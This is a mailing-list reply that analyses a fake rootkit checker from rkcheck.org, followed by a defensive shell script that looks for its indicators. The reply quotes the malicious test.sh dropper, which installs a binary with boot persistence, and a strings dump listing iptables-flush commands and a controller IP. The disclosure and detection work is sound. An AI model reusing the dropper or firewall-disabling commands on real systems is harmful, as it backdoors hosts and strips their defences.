has my 10.1-RELEASE system been compromised

Christopher Schulte christopher at schulte.org
Wed Feb 25 20:56:22 UTC 2015


> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
> 
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains 
> 
> #!/bin/bash
> 
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
> 
> That doesn't look like something you'd want on your box…

I filed a report with Google about that domain (Google Safe Browsing), briefly describing what’s been recounted here on this thread.  It seems quite suspicious, agreed.

Has anyone started an analysis of the rrsyncn binary?  The last few lines of a simple string dump are interesting… take note what looks to be an IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
> 
> Philip

Chris
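For anyone wanting to check a box for the artifacts named in this thread, the following is an added example (not code from the thread or from any project): a POSIX sh script that looks for the dropped binary and the rc2.d persistence symlink from the quoted test.sh, and greps a candidate file for the iptables-flush sequence and the 95.215.44.195 string seen in Chris's dump. The root-directory parameter, the function names and the constructed test tree are assumptions made for the example; the paths and strings themselves come from the thread.

```shell
#!/bin/sh
# Defensive indicator check for the rkcheck.org / rrsyncn dropper described in
# this thread. Findings go to stderr; each function prints only its hit count
# to stdout so callers can test the result. ROOT lets you point it at a
# mounted image or a constructed test tree instead of the live system.

IOC_IP="95.215.44.195"   # address seen in the strings dump of rrsyncn

# check_rrsyncn_files ROOT  -> prints number of filesystem indicators found
check_rrsyncn_files() {
    root="${1:-/}"; root="${root%/}"
    hits=0
    for p in /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn; do
        # -L catches a dangling symlink that -e would miss
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            echo "INDICATOR: $root$p present" >&2
            hits=$((hits + 1))
        fi
    done
    # The dropper symlinks the rc script straight to the binary; show the target
    if [ -L "$root/etc/rc2.d/S98rsyncn" ]; then
        echo "  -> symlink target: $(readlink "$root/etc/rc2.d/S98rsyncn")" >&2
    fi
    echo "$hits"
}

# scan_binary_strings FILE  -> prints number of string indicators found in FILE
scan_binary_strings() {
    f="$1"
    count=0
    # grep -a treats the binary as text, so no separate 'strings' run is needed
    if grep -aq "$IOC_IP" "$f"; then
        echo "INDICATOR: $f contains $IOC_IP" >&2
        count=$((count + 1))
    fi
    if grep -aq 'iptables -F' "$f" && grep -aq 'iptables -P INPUT ACCEPT' "$f"; then
        echo "INDICATOR: $f carries an iptables flush / open-policy sequence" >&2
        count=$((count + 1))
    fi
    echo "$count"
}

# build_constructed_tree DIR  -> constructed sample: mimics what test.sh leaves
# behind (assumption for demonstration only, not a real infection)
build_constructed_tree() {
    d="$1"
    mkdir -p "$d/usr/bin" "$d/etc/rc2.d"
    printf '%s\n' '/bin/sh' 'iptables -F 2> /dev/null' \
        'iptables -P INPUT ACCEPT 2> /dev/null' 'udevd' "$IOC_IP" \
        > "$d/usr/bin/rrsyncn"
    ln -s /usr/bin/rrsyncn "$d/etc/rc2.d/S98rsyncn"
}

# Demo against a constructed tree; run check_rrsyncn_files / with no argument
# to inspect the live host.
demo=$(mktemp -d)
build_constructed_tree "$demo"
echo "filesystem indicators: $(check_rrsyncn_files "$demo")"
echo "string indicators:     $(scan_binary_strings "$demo/usr/bin/rrsyncn")"
rm -rf "$demo"
```

On a live system run `check_rrsyncn_files /` and, if the binary is present, `scan_binary_strings /usr/bin/rrsyncn`; a count of 0 from both only means these particular artifacts are absent, not that the host is clean.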
